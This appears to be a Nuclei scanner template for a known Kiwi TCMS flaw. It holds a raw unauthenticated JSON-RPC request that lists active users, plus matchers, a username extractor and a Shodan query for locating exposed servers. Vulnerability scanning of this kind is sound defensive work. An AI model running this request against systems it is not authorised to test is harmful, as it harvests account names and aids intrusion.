id: kiwitcms-json-rpc info: name: Kiwi TCMS Information Disclosure author: act1on3 severity: high reference: - https://hackerone.com/reports/968402 - https://kiwitcms.org/blog/kiwi-tcms-team/2020/08/23/kiwi-tcms-86/ - https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml metadata: max-request: 1 shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 tags: kiwitcms,exposure,misconfig,hackerone http: - raw: - | POST /json-rpc/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Accept-Encoding: gzip, deflate {"jsonrpc":"2.0","method":"User.filter","id": 1,"params":{"query":{"is_active":true}}} matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - result - username - jsonrpc - is_active condition: and extractors: - type: json part: body json: - .result[].username